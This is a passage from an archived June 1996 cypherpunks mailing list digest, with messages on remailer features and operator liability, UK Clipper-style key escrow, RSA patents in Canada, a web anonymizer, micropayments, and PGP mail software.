          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mixmaster@remail.obscura.com (Mixmaster)
Date: Tue, 18 Jun 1996 08:37:59 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199606171540.IAA02659@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:14 PM 6/16/96 -0500, "John A. Perry" wrote:
:-----BEGIN PGP MESSAGE-----
:Version: 2.6.2
:
:hIwDSReYoIbc3PkBA/9xblBrrofx89t5QoJVwCyGB/+futdCXEolwcsQdwWGcDtc
:7Vn7orCB8v6iQO+sCgAlYf38ftUxGmzebDd/7eWodTGx8XKnzBIZ9E6bRS38XLRa
:XDaipoiNRDi7gX2DA5ADtshTLtUiCjaYurGxGEla2iIMrEacGEyyekdZpUYT1KYA
:AAJ17fM4D2X8vpKTtWLr/6REeQvxPU80FpWKa/q1b6wMZ43oG9ZolMONj65hWqX0
:mhY+wp/vUsvQ21P/9VzYF0sy9JIAr45VhoDZBBCG0UW23WoOInXko2Kl2UeZmrut
:xR/nZm1sMzU+XYr7QG17aOfeezRs/frYEpvuAbrWYNELlPH72OBJ368nSkesiTo+
:gELda7vNsD12UTEl7gRAo3WizCY2zsQySLOShEiAX7f5vYco8A6pEwJ4XYs4pGn6
:xV4JNUeMjBKGtVkGoZJln3x7W1brgGmRNQbY/dcmCkExOOp+4myRVu0/ufH7n5TO
:FWqrb+nqyjgnirqS9DwoqB5JsHiMWU/dJBaCtXH4i1p//oeE9FE82nE2vAOZGMvn
:D+MRnheCVRi2TWnwe44PnB+L5z7+J+YJyulGM3bvXhZukjGCAj+EMmWxqkSgc2NS
:/xh6efgZNACmQIqxLdsw6TLbh9p+yMaxtaCZU9Bs9jw8dN+7FBZxgFG/hrrI1uh3
:oFahFMDXXAUMUs7lFOcxjAWTRRZKKSOG2mg5M5mr8VbY+5BQdcJJeY+jSCnDinUC
:wGFfEWlZMV7sdKhzA0YkHJYBgAPtmTaxrHQidPce46FbIeYVRsUOSEtvttYpMjIz
:mCVc5ywueUXbUe5UW3KrlV8uxKH3fEIEZ9Pxf3M9XR/aFXysccnzNzbe87XN8PDk
:mxzsRzmoD0CgCSAGfNrTdWl8bFQGnEaweMPnSIFzbSJkRcO0oiBU4/dhEFYiPgx5
:UD2r0uFNjKPt4KFBbFJLi0mrMuOCaxjhva7i70GQ95b4qVsyOZLN5KYSUnSDxDX4
:HFUIrEI/rsw=
:=BesD
:-----END PGP MESSAGE-----
:
My Cypherpunk's New Member's Package did not contain the key to decypher this obviously witty and succinct message; I would appreciate an individual with full membership to pgp this and post it for the benefit of others.

Anyone with key id 86DCDCF9 come on down!

Thanks.

   






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Tue, 18 Jun 1996 01:05:19 +0800
To: frissell@panix.com>
Subject: Re: Remailer Operator Liability?
In-Reply-To: <2.2.32.19960617102038.00b7949c@panix.com>
Message-ID: <UllJ=kK00YUyI3Snos@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 17-Jun-96 Re: Remailer Operator
Liabi.. by Duncan Frissell@panix.co 
> However, even if remailers didn't exist, kiddies could still be unknowingly
> reached via mailing lists (anyone know who came up with the term "email
> exploder" that the Court used instead of "mailing list"?), freenet accounts,
> un- age verified accounts opened anywhere on earth, or borrowed accounts.
> The decision mentioned some of this.

I believe we used the term "email exploder" instead of "mailing list,"
particularly in cross-examination and closing arguments, to convey the
idea that such a device is often used for conversation, not just one-way
communication.

The fight-censorship list (mail exploder?) is part of the lawsuit, and
my sworn testimony included:

  the list sometimes includes material that could be considered
"indecent" or   "patently offensive."  Minors are not excluded from this
list.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Tue, 18 Jun 1996 01:17:05 +0800
Subject: Re: UK users about to get clippered
In-Reply-To: <199606171003.MAA21827@basement.replay.com>
Message-ID: <Pine.SUN.3.91.960617083538.11474A-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


This has been slightly discussed on cypherpunks already. The url for the 
DTI report has been posted, and somebody mentioned an IEE meeting where 
things are supposed to be unveiled on the 27th. 


I'm in the UK at the moment - I asked if there were any plans for a 
cypherpunks presence at the meeting, but didn't get any responses. 
It's currently a DTI white-paper, and is not inevitable with 
appropriate lobbying 

Simon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 18 Jun 1996 02:40:23 +0800
To: "Declan B. McCullagh" <cypherpunks@toad.com
Subject: Re: Remailer Operator Liability?
Message-ID: <2.2.32.19960617134543.00766238@popserver.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:43 AM 6/17/96 -0400, Declan B. McCullagh wrote:

>I believe we used the term "email exploder" instead of "mailing list,"
>particularly in cross-examination and closing arguments, to convey the
>idea that such a device is often used for conversation, not just one-way
>communication.

Was this term invented during the hearings or has anyone heard of it before?

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Tue, 18 Jun 1996 04:09:18 +0800
To: s1113645@tesla.cc.uottawa.ca
Subject: Re: RSA patents in Canada
In-Reply-To: <Pine.3.89.9606161647.A19358-0100000@tesla.cc.uottawa.ca>
Message-ID: <96Jun17.095732edt.10195@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


> On Tue, 11 Jun 1996 sameer@c2.org wrote:
> 
> > 	Anyone have a definitive source on the state of the RSA patent
> > in Canada? Thanks.
> 
> I keep hearing that it is only patented in the States by virtue of having
> been presented in public before the application (which they did to avoid a 
> gag order). I know that Schneier and others list it as only patented in 
> the States. 
> 
> Are you wondering whether some odd provision of NAFTA would give it
> protection in Canada? Otherwise it should be public domain. Anyone else
> know for certain? 

My understanding was that it couldn't be patented in Canada, because
Canadian law does not acknowledge patents on algorithms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Tue, 18 Jun 1996 04:30:08 +0800
To: root@HellSpawn (Damien Lucifer)
Subject: Re: The Molson Great Web Anonymizer
In-Reply-To: <Pine.LNX.3.91.960616203924.4401A-100000@HellSpawn>
Message-ID: <199606171516.KAA21408@homeport.org>
MIME-Version: 1.0
Content-Type: text


Except that Molson is doubtless doing substantial analysis of where
its users go.  Chaining is no use, since the URL gets passed in the
clear.

Web proxies will need to add encrypted URL support to do chaining.
This doesn't require anything on the browser, except SSL.  (Proper
trafic analysis prevention might require mixing of streams, which
implies delays, which amy be unacceptable for most web browsing.)

(Wei pointed this out a long time ago; real time traffic is tough to
protect.)

Adam


Damien Lucifer wrote:

| Actually, they call it the Molson Web Canadianizer, but it looks like an 
| anonymizer to me.  You give it a URL and the Canadianizer grabs the URL 
| and adds some funny canadian modifications to the page, and sends it back 
| to you.  It changes all the links to link through the canadianizer, also, 
| which is convenient. 
| 
| This page originally allowed you to specify a url, but now it seems they 
| only allow you to click and grab a random page. Specifying the address to 
| connect to in your browser will solve this though.. Heres the URL:
| 
| 
| http://www.molson.com/cgi-bin/cize?url=http://www.your.site.com/the/url
| 
| 


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Stephan Vladimir Bugaj" <stephan@studioarchetype.com>
Date: Tue, 18 Jun 1996 10:08:54 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: Micropayments are Crap
In-Reply-To: <v03006f00ade3a25564ae@[204.162.75.169]>
Message-ID: <v03006f00adeae1c27e39@[204.162.75.169]>
MIME-Version: 1.0
Content-Type: text/plain


There is too much traffic on the Cypherpunks list for me - personally - to be
able to follow a single discussion very consistantly (maybe I should write
better filters...).  So I will address your last email generally.  I agree
that many of my points are points about capitalism in general, but
micropayments are the latest capitalist craze and serves to  underscore
some of these problems.  Perhaps you are right that they can ameliorate
some of the problems of capitalism, but I think there is also a great
potential for abuse and profit bloating that will serve only to exascerbate
the problems.  Sometimes 'straw men' are needed to make example cases of
what *can* happen before people leap ahead without thinking, and can only
in retrospect commiserate with eachother about what did happen...  the FUD
that is associated with any new technology should be better analyzed by the
few who care about the future rather than those who just worship the future
to ensure that the decisions which are made by this almighty 'market'
(again, I distinguish this from either the 'people' or the 'consumers') are
the right ones.  Again, I realize the market does not oppose this idea, but
that doesn't mean that some people won't feel that the idea is being
'rammed down their throats'.  Sometimes people forget that technologists
and their venture capitalist backers aren't the best representative sample
of the world's population, nor are they a reliable source of objective
information about the correlation between the 'market' and the 'polit'.

Micropayments might be a great idea (though I see potential flaws which, if
addressed, would only serve to make the idea great in implementation as
well as in theory - yet people will resist addressing these potential flaws
and rely on hindsight to fix problems that do arise). I'm just proposing
the ridiculous notion that this and other technologies be preceeded by
forthought and public debate before their implementation.  No matter how
much one reifies techology, it all comes back to people in the end.


ttl
Stephan


-------------------------------------------------------------------
This signature has been kidnapped by space aliens.
If you find it you can call (415) 703-8748.
I work for Studio Archetype, and they don't find any of this funny.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Tue, 18 Jun 1996 08:39:38 +0800
To: cypherpunks@toad.com
Subject: Re: Remailer Operator Liability?
In-Reply-To: <UllJ=kK00YUyI3Snos@andrew.cmu.edu>
Message-ID: <199606171557.KAA03404@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> (anyone know who came up with the term "email exploder" that the Court 
> used instead of "mailing list"?)

The only time I've ever heard the term was in conjunction with the email 
sent out by the Clinton campaign during the last election.  

I probably misunderstood what was going on, but at the time I assumed that
it was a little different than a mail list.  My impression was that it
was for broadcasting rather than disucssing (ie., only the campaign could
use it), and that it was hierarchical in nature (mail goes to a dozen or a
hundred "exploders" who then send it out to a couple of hundred thousand
individuals). 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 18 Jun 1996 13:21:35 +0800
To: hfinney@shell.portal.com
Subject: Re: alpha.c2.org in deep shit?
In-Reply-To: <199606161825.LAA02892@jobe.shell.portal.com>
Message-ID: <199606171817.LAA26885@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	It should be fixed soon. Note that this is a free service and
maintaining it is at the bottom of our priority list.

> 
> I peeked at a few messages passing through my remailer from alpha.c2.org
> (mea culpa) to see whether the problem might be at my end.  As far as
> I could tell, the messages were correctly formatted and all, but simply
> lacked message bodies.  So it looked like the data being sent from
> alpha.c2.org was already messed up and had stripped the bodies.  I set up
> an alpha.c2.org alias a few days ago and when I sent mail to myself I
> got mail without a body, so I think it is a definate screwup.  I sent a
> report of this to remailer-operators list but have not seen a response
> yet from Sameer.
> 
> Hal
> 


-- 
Sameer Parekh					Voice:   510-986-8770
Community ConneXion, Inc.			FAX:     510-986-8777
The Internet Privacy Provider
http://www.c2.net/				sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 18 Jun 1996 10:21:52 +0800
To: cypherpunks@toad.com
Subject: Re: UK users about to get clippered
Message-ID: <199606171820.LAA29791@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:03 PM 6/17/96 +0200, Anonymous wrote:
>If you live the UK, brace yourself for HMG's "Clipper" annoucement
>later this week.  Look particularly carefully at the escrow agencies.
>- Remailereuters

And it should go over even less well than American Clipper.  When that was 
proposed, in April of 1993, there was no standard encryption chip nor the 
immediate prospect of one.  Someone might, at least arguably, have been 
attracted to Clipper with the argument that it's better than no encryption 
at all.  However, now that the NTT chip has been revealed, nobody is going 
to be under the illusion that it's "Clipper or nothing."


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Tue, 18 Jun 1996 06:34:47 +0800
To: <cypherpunks@toad.com
Subject: Re: PBS show
Message-ID: <199606171517.IAA21218@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Received: from toad.com [140.174.2.1] by alcor.process.com
           with SMTP-OpenVMS via TCP/IP; Thu, 13 Jun 1996 14:15 -0400
Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id JAA03979 for cypherpunks-outgoing; Thu, 13 Jun 1996 09:36:36 -0700 (PDT)
Received: from mail.pacifier.com (root@mail.pacifier.com [199.2.117.164]) by toad.com (8.7.5/8.7.3) with ESMTP id JAA03971 for <cypherpunks@toad.com>; Thu, 13 Jun 1996 09:36:30 -0700 (PDT)
Received: from ip9.van1.pacifier.com (ip9.van1.pacifier.com [206.163.4.9]) by mail.pacifier.com (8.7.5/8.7.3) with SMTP id JAA22527; Thu, 13 Jun 1996 09:36:13 -0700 (PDT)
Message-Id: <199606131636.JAA22527@mail.pacifier.com>
X-Sender: jimbell@mail.pacifier.com
X-Mailer: Windows Eudora Light Version 1.5.2
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Thu, 13 Jun 1996 09:35:16 -0800
To: tcmay@got.net (Timothy C. May), cypherpunks@toad.com
From: jim bell <jimbell@pacifier.com>
Subject: Re: PBS show
Sender: owner-cypherpunks@toad.com
Precedence: bulk

Jim Bell wrote:

>But the Apple II WAS a toy!  Non-detached keyboard, poor placement of reset 
>key, upper-case only, 40-character wide display, odd microprocessor, VERY 
>SMALL capacity floppies (which were very slow as well), as well as a hostile 
>legal situation regarding the building of clones.  Hell, they even objected 
>to other companies building boards which plugged into the bus!

The reason for the 40 column screen was quite simple - many customers
did not want to shell out a few hundred dollars for a monitor, and
instead installed a cheap RF modulator and used an old TV for a
screen. The resolution of a TV is inadequate for 80 coumn text (think
about the smallest easily readable text you've seen on braodcast or
cable).

The Apple ][ did not include the RF modulator because it wasn't FCC
certified with one - but every dealer also sold $20 modulators tailored for
the machine. With the unshielded plastic case, I could wipe out any other
TV within 30 feet - a significant distance for a NYC apartment dweller,
which I was at the time.

While it was not the first machine I programmed (the PDP-8e has that dubious
honor, circa 1971), I learned a lot from my Apple ][. Among other feats, I 
added lower case support to Apple Kermit, and implemented Life in 
6502 assembler using HIRES graphics.

Peter Trei
trei@process.com

Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 18 Jun 1996 07:18:12 +0800
To: "Declan B. McCullagh" <frissell@panix.com>
Subject: Gilbert & Cypherpunk...
In-Reply-To: <2.2.32.19960617102038.00b7949c@panix.com>
Message-ID: <v03006f0aadeb295fb6c0@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:43 AM -0400 6/17/96, Declan B. McCullagh wrote:
> I believe we used the term "email exploder" instead of "mailing list,"
> particularly in cross-examination and closing arguments, to convey the
> idea that such a device is often used for conversation, not just one-way
> communication.

Ah. Probably related to that famous proto-cypherpunk character in the
Gilbert and Sullivan operetta Utopia, Ltd., the Anonymous Royal
Mail-Exploder....

<hyuk!>

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 18 Jun 1996 10:27:56 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Remailer Operator Liability?
Message-ID: <199606171852.LAA03186@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>(anyone know who came up with the term "email
>exploder" that the Court used instead of "mailing list"?)

Brendan P Kehoe's "Zen and the Art of the Internet" (1993) discussing
mailing lists says (p11), "Any mail sent to that address will "explode" out
to each person named in a file maintained on a computer at ..." 

I have seen it used elsewhere as well. 

Bill


-------------------------------------------------------------------------
Bill Frantz       | The Internet may fairly be | Periwinkle -- Consulting
(408)356-8506     | regarded as a never-ending | 16345 Englewood Ave.
frantz@netcom.com | worldwide conversation.    | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 17 Jun 1996 21:52:07 +0800
To: cypherpunks@toad.com
Subject: UK users about to get clippered
Message-ID: <199606171003.MAA21827@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


If you live the UK, brace yourself for HMG's "Clipper" annoucement
later this week.  Look particularly carefully at the escrow agencies.


- Remailereuters





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 18 Jun 1996 10:37:04 +0800
To: Duncan Frissell <cypherpunks@toad.com
Subject: Re: Remailer Operator Liability?
Message-ID: <v02120d52adeb5e9f2fe4@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:45 6/17/96, Duncan Frissell wrote:
>At 08:43 AM 6/17/96 -0400, Declan B. McCullagh wrote:
>
>>I believe we used the term "email exploder" instead of "mailing list,"
>>particularly in cross-examination and closing arguments, to convey the
>>idea that such a device is often used for conversation, not just one-way
>>communication.
>
>Was this term invented during the hearings or has anyone heard of it before?

I have heard of it before. I believe "mail exploder" is a rather old term.



-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
   Disclaimer: My opinions are my own.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 18 Jun 1996 11:43:04 +0800
To: "Stephan Vladimir Bugaj" <stephan@studioarchetype.com>
Subject: Re: Micropayments are Crap
In-Reply-To: <v03006f00adeae1c27e39@[204.162.75.169]>
Message-ID: <199606171945.MAA12205@netcom4.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Mr. Bugaj makes some very good points about micropayments
being a current capitalist fad etc, and I think his idea
that venture capitalists do not necessarily exactly represent
the interests of the population is interesting.
his general message seems to be "lets look before we leap".

I tend to agree that abuses of micropayments will be possible
and one of the difficult hurdles for the system to overcome.
I don't know how pathological or difficult they will be. 
intuitively it seems like they will be less severe than
existing problems that have largely already been solved
by bank technologies. however it is quite possible (perhaps
even probable) that entirely new problems are going to
arise with the introduction of micropaymens.

so I wonder if people have ideas on some of the key problems
that might arise with micropayments. it would be very useful
to try to "head them off at the pass" and imagine what the
implications of micropayments are going to be.

here are two main problems I see right off the bat:

1. taxation. I suspect once the digital economy begins to 
get off the ground, the government is going to want to tax
it, and in a way that is enforced technologically. I wouldn't
be surprised if there are future proposals for "clipper like"
technology that integrates taxation mechanisms right into
the billing networks, mandatorily-- i.e. it is not up to the
person to report it; they simply can't escape the reporting. 

 furthermore when people
begin to realize that "anyone" can effectively "create" cash,
I expect to witness a lot of legislative panic ala today's
pornography or whatever. (digital pornography is going to be extremely
trivial in social implications compared to the ramifications of
digital cash).

the taxation problem is a part of a much larger problem: that
of good government. could it be that microcurrency will affect
our government? I think so. cyberspace has already begun to
have discernable and palpable effects on government. and it
is only beginning.  so what I would like to say is that if we
solved the problem of having a good government, issues like
taxation would take care of themselves.

2. copyrights. the issue of copyrights is not even resolved today.
when serious cash starts to be associated with cyberspace you
are going to see a lot of incredibly agitated people, especially
lawyers. I imagine systems will evolve that are similar to 
a technology that has evolved by which radio stations pay music
companies whenever they play artists songs. (if any cpunks could
elaborate on this system, I think it is an excellent preliminary
example of how a microcurrency-like system would interact with
a copyright situation).  I think similar standards are going to
be developed by which web page designers build up their pages,
and a distribution mechanism of charges will be intrinsic. 
the author will get their desired "cut" of every transaction,
the site editor will get some kind of cut, etc.   

this really revolutionizes the idea of a magazine or editor. 
suddenly anyone on the net can become an editor or writer,
and become as financially successful as the market will support.
the "scrape off" due to enormous bureacracies (media conglomerates)
is going to vanish and be funneled into a renaissance of artistry
I suspect.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 18 Jun 1996 09:05:44 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Remailer Operator Liability?
In-Reply-To: <2.2.32.19960617134543.00766238@popserver.panix.com>
Message-ID: <199606171703.NAA19819@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Duncan Frissell writes:
> At 08:43 AM 6/17/96 -0400, Declan B. McCullagh wrote:
> 
> >I believe we used the term "email exploder" instead of "mailing list,"
> >particularly in cross-examination and closing arguments, to convey the
> >idea that such a device is often used for conversation, not just one-way
> >communication.
> 
> Was this term invented during the hearings or has anyone heard of it before?

It is not common, but it used to be used in the early days a lot. I
don't think I've heard it much since '85 or so.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdudar@solutions.net
Date: Tue, 18 Jun 1996 10:32:02 +0800
To: "John A. Perry" <perry@alpha.jpunix.com>
Subject: Re: alpha.c2.org in deep shit?
Message-ID: <2.2.16.19960617134123.4e17463c@mail.solutions.net>
MIME-Version: 1.0
Content-Type: text/plain


Huh?


At 06:14 PM 6/16/96 -0500, you wrote:
>-----BEGIN PGP MESSAGE-----
>Version: 2.6.2
>
>hIwDSReYoIbc3PkBA/9xblBrrofx89t5QoJVwCyGB/+futdCXEolwcsQdwWGcDtc
>7Vn7orCB8v6iQO+sCgAlYf38ftUxGmzebDd/7eWodTGx8XKnzBIZ9E6bRS38XLRa
>XDaipoiNRDi7gX2DA5ADtshTLtUiCjaYurGxGEla2iIMrEacGEyyekdZpUYT1KYA
>AAJ17fM4D2X8vpKTtWLr/6REeQvxPU80FpWKa/q1b6wMZ43oG9ZolMONj65hWqX0
>mhY+wp/vUsvQ21P/9VzYF0sy9JIAr45VhoDZBBCG0UW23WoOInXko2Kl2UeZmrut
>xR/nZm1sMzU+XYr7QG17aOfeezRs/frYEpvuAbrWYNELlPH72OBJ368nSkesiTo+
>gELda7vNsD12UTEl7gRAo3WizCY2zsQySLOShEiAX7f5vYco8A6pEwJ4XYs4pGn6
>xV4JNUeMjBKGtVkGoZJln3x7W1brgGmRNQbY/dcmCkExOOp+4myRVu0/ufH7n5TO
>FWqrb+nqyjgnirqS9DwoqB5JsHiMWU/dJBaCtXH4i1p//oeE9FE82nE2vAOZGMvn
>D+MRnheCVRi2TWnwe44PnB+L5z7+J+YJyulGM3bvXhZukjGCAj+EMmWxqkSgc2NS
>/xh6efgZNACmQIqxLdsw6TLbh9p+yMaxtaCZU9Bs9jw8dN+7FBZxgFG/hrrI1uh3
>oFahFMDXXAUMUs7lFOcxjAWTRRZKKSOG2mg5M5mr8VbY+5BQdcJJeY+jSCnDinUC
>wGFfEWlZMV7sdKhzA0YkHJYBgAPtmTaxrHQidPce46FbIeYVRsUOSEtvttYpMjIz
>mCVc5ywueUXbUe5UW3KrlV8uxKH3fEIEZ9Pxf3M9XR/aFXysccnzNzbe87XN8PDk
>mxzsRzmoD0CgCSAGfNrTdWl8bFQGnEaweMPnSIFzbSJkRcO0oiBU4/dhEFYiPgx5
>UD2r0uFNjKPt4KFBbFJLi0mrMuOCaxjhva7i70GQ95b4qVsyOZLN5KYSUnSDxDX4
>HFUIrEI/rsw=
>=BesD
>-----END PGP MESSAGE-----
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: design@pathfinder.com
Date: Tue, 18 Jun 1996 11:24:13 +0800
To: Multiple recipients of list DESIGN-L             <DESIGN-L@pathfinder.com>
Subject: Pathfinder's New Look
Message-ID: <199606171752.NAA00909@tigger.dev.pathfinder.com.pathfinder.com>
MIME-Version: 1.0
Content-Type: text


Dear Pathfinder Member:

We're excited to announce a major redesign of Pathfinder, your home on the
Net, and invite you to come and check it out at http://pathfinder.com!

The NEW look of Pathfinder is our response to your feedback. We've made it
FASTER LOADING, EASIER TO NAVIGATE and added even more DAILY and
INTERACTIVE content.  And, we've taken advantage of the latest technologies
like Java to make your Pathfinder experience more informative and fun.

Whether it's up-to-the-minute news and weather, the latest sports scores,
stock quotes or today's celebrity gossip - you can now find it all at the
click of a mouse.  If you don't see what you're looking for just click on
the SEARCH button and we'll help you find it -   if it's on Pathfinder or
somewhere else on the Net.

When we launched in October 1994, Pathfinder was considered a
ground-breaking effort on the Web.  Today, Pathfinder is a true super-site,
containing more than 150,000 web pages from over 90 of the biggest names in
news, information and entertainment - names you trust like Time, Money,
Sports Illustrated, Entertainment Weekly, People and Fortune.

Much more important than our size, however, is our loyal base of Pathfinder
users.  With your help and support Pathfinder has grown from just a large
web site into a vibrant virtual community of members and ideas.

We'd be very interested in your feedback on our new look - just click on
the "Welcome" banner at the top of the homepage and you can send us all
your thoughts and ideas.  And, if you find you have any questions while
visiting Pathfinder, be sure to check out our new online HELP area.

Sincerely,


Marie Blue
Director of Consumer Marketing

P.S.  Stay tuned for details on our exciting new product, PATHFINDER
PERSONAL EDITION.  It's a fully personalizable and customizable online news
and information service  plus - get the information you want, when you want
it!  See our homepage for more information.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@MICROSOFT.com>
Date: Tue, 18 Jun 1996 15:39:58 +0800
Subject: RE: Micropayments are Crap
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-960617212404Z-33164@tide21.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>From: 	Vladimir Z. Nuri
>
>this really revolutionizes the idea of a magazine or editor. 
>suddenly anyone on the net can become an editor or writer,
>and become as financially successful as the market will support.
................................................................


Really.  This will be a tremendous boon for individuals, with great
potential for capitalistic profits, what with all those consumers
(otherwise known as "people") benefitting from the large variety of
services available through the Almighty Free Market (The Now
All-Oneness, All HTML One-Stop-Shop).

   ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Computer Virus Help Desk <vhd@pobox.com>
Date: Tue, 18 Jun 1996 10:49:12 +0800
To: cypherpunks@toad.com
Subject: Blowfish Reliability
Message-ID: <2.2.32.19960617182604.0067dfa0@indy.net>
MIME-Version: 1.0
Content-Type: text/plain


Can anyone say with any degree of certainty what resources it would require
to crack a file encrypted with 160 Bit Blowfish?  Many Thanks!

CVHD





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lou Zirko <lzirko@c2.org>
Date: Tue, 18 Jun 1996 13:05:52 +0800
To: richieb@teleport.com
Subject: Re: Snake Oil on the Water...
Message-ID: <199606172145.OAA16451@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: dsmith@prairienet.org, richieb@teleport.com, cypherpunks@toad.com,
 secure@commtouch.com
Date: Mon Jun 17 16:44:10 1996
Pronto Secure, currently in beta 6.16, is shaping up as a fine 
all-inclusive mail package that supports PGP.  You might want to take a 
look at it at:

Beta Testers residing in the USA are invited to download the beta from:

        http://www.commtouch.com/secus/secus1.htm

Non US residents should download from:

        http://www.commtouch.com/secnon/secintl1.htm

I have been with it since beta 1 and it definately has come a long way.  
Platforms supported are the MS GUI.  It is a 16-bit app.  I currently run 
it under NT 3.51 w/ 32-bit PGP executables.

Take a look.

Lou Z.


Lou Zirko                                (502)383-2175
Zystems                                  lzirko@c2.org
"We're all bozos on this bus" - Nick Danger, Third Eye

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1

iQEVAwUBMcXR4ctPRTNbb5z9AQH8Tgf/aCWChVMTKFyv+NpADQqosnMO2C7EAj/Z
o+O2KwQ91YVaRpkmJjrHzQuP+ou6YKHi5hH9SLRbN5Ox4/8YMmaOIRjqOrTmgta8
+fMBAtJ01AyWW9ZZh0sfEqM32RQ8Pt+x2Q8+MuyuEU/9vaeGhbb7DksGA8y2ht/5
uDKBUtrGgxAS7Yr2VRJVJXNd1b7eFdKGFUhBJJo9ig11/ICHcXVbUqpQ9Iqi2aRT
hoRRVtiMawCJznXaYid+2fami/pgtq/i00kV9y4ge3TOooxM4KZB3LZziCbS8R4d
AfaG9dj0wP50/zDhFxdExVc6NbQzTyr3kY+4z/47qkIZZ3wn5paezw==
=FO3b
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ".." <warpdriv@mindport.net>
Date: Tue, 18 Jun 1996 13:20:47 +0800
To: "'John Young'" <jya@pipeline.com>
Subject: RE: Non-Lethal Terrorism
Message-ID: <01BB5C5E.E998B140@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


